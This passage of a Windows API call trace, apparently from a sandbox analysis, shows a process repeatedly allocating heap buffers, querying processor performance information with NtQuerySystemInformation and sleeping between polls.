lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.333] Sleep (dwMilliseconds=0x110) [0243.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0243.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0243.348] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0243.348] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.349] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0243.349] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0243.349] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.350] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0243.350] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0243.350] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.351] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0243.351] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.351] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.351] Sleep (dwMilliseconds=0x110) [0243.357] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0243.357] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.358] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0243.358] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0243.358] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.358] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0243.358] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0243.358] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0243.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0243.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0243.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.360] Sleep (dwMilliseconds=0x110) [0243.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0243.373] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0243.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0243.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0243.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0243.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0243.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0243.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0243.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.380] Sleep (dwMilliseconds=0x110) [0243.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0243.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0243.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0243.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0243.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0243.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0243.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0243.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0243.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.395] Sleep (dwMilliseconds=0x110) [0243.403] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0243.403] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.404] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0243.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0243.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0243.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0243.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0243.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0243.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0243.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.410] Sleep (dwMilliseconds=0x110) [0243.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0243.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0243.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0243.441] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.446] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0243.446] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0243.446] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.451] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0243.464] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0243.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0243.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.473] Sleep (dwMilliseconds=0x110) [0243.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0243.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0243.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0243.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0243.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0243.485] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0243.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0243.485] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0243.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.486] Sleep (dwMilliseconds=0x110) [0243.497] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0243.497] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.498] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0243.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0243.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0243.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0243.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0243.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0243.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0243.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.503] Sleep (dwMilliseconds=0x110) [0243.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0243.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0243.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0243.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0243.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0243.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0243.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0243.520] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0243.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.521] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.521] Sleep (dwMilliseconds=0x110) [0243.528] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0243.528] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.529] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0243.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0243.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.529] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0243.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0243.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0243.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0243.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0243.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.531] Sleep (dwMilliseconds=0x110) [0243.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0243.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0243.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0243.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0243.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0243.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0243.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0243.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0243.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.547] Sleep (dwMilliseconds=0x110) [0243.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0243.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0243.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0243.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0243.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0243.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0243.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0243.563] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.563] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0243.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.564] Sleep (dwMilliseconds=0x110) [0243.575] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0243.575] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.576] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0243.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0243.576] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.576] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0243.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0243.576] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0243.577] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0243.577] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0243.577] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0243.578] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0243.578] Sleep (dwMilliseconds=0x110) [0243.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0243.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0243.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0243.598] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0243.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0243.599] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0243.599] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0243.599] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0243.599] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0243.600] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: 